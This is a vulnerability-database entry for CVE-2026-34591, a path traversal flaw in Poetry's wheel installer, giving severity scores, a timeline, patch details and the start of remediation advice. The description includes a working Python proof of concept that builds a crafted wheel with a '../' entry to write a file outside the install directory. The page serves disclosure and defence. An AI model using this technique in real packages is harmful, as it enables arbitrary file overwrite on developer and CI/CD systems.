CVE-2026-34591

HIGH
2026-04-01 https://github.com/python-poetry/poetry GHSA-2599-h6xx-hpxp
7.1
CVSS 4.0
Share

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 01, 2026 - 23:16 vuln.today
CVE Published
Apr 01, 2026 - 22:17 nvd
HIGH 7.1

Tags

Path Traversal

Description

### Summary A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process. ### Impact Arbitrary file write (path traversal) from untrusted wheel content. Impacts users/CI/CD systems installing malicious or compromised packages. ### Patches Versions 2.3.3 and newer of Poetry resolve the target paths and ensure that they are inside the target directory. Otherwise, installation is aborted. ### Details Poetry’s wheel destination path is built by directly joining an untrusted wheel entry path: src/poetry/installation/wheel_installer.py:47 src/poetry/installation/wheel_installer.py:59 The vulnerable sink is reachable in normal installation: src/poetry/installation/executor.py:607 No resolve() + is_relative_to() style guard is enforced before writing. ### POC ``` from pathlib import Path import tempfile, zipfile, sys from installer import install from installer.sources import WheelFile from poetry.installation.wheel_installer import WheelDestination root = Path(tempfile.mkdtemp(prefix="poetry-poc-")) wheel = root / "evil-0.1-py3-none-any.whl" base = root / "venv" / "lib" / "pythonX" / "site-packages" for d in [base, root/"venv/scripts", root/"venv/headers", root/"venv/data"]: d.mkdir(parents=True, exist_ok=True) files = { "evil/__init__.py": b"", "../../pwned.txt": b"owned\n", "evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n", "evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n", } files["evil-0.1.dist-info/RECORD"] = ("\n".join([f"{k},," for k in files] + ["evil-0.1.dist-info/RECORD,,"])+"\n").encode() with zipfile.ZipFile(wheel, "w") as z: for k,v in files.items(): z.writestr(k,v) dest = WheelDestination( {"purelib":str(base),"platlib":str(base),"scripts":str(root/"venv/scripts"),"headers":str(root/"venv/headers"),"data":str(root/"venv/data")}, interpreter=sys.executable, script_kind="posix" ) with WheelFile.open(wheel) as src: install(src, dest, {"INSTALLER": b"PoC"}) out = (base / "../../pwned.txt").resolve() print("outside write:", out.exists(), out) ```

Analysis

Path traversal in Poetry's wheel installer (versions prior to 2.3.3) allows malicious Python packages to write arbitrary files outside the installation directory during package installation. Attackers can craft wheel files containing ../ directory traversal sequences that bypass containment checks, enabling file overwrite with Poetry process privileges. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Remediation

Within 24 hours: Inventory all Poetry installations across development and CI/CD environments; document current versions and deployment locations. Within 7 days: Upgrade Poetry to version 2.3.3 or later immediately on all systems; if upgrade is blocked, implement compensating controls below. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

36
Low Medium High Critical
KEV: 0
EPSS: +0.1
CVSS: +36
POC: 0

Share

CVE-2026-34591 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy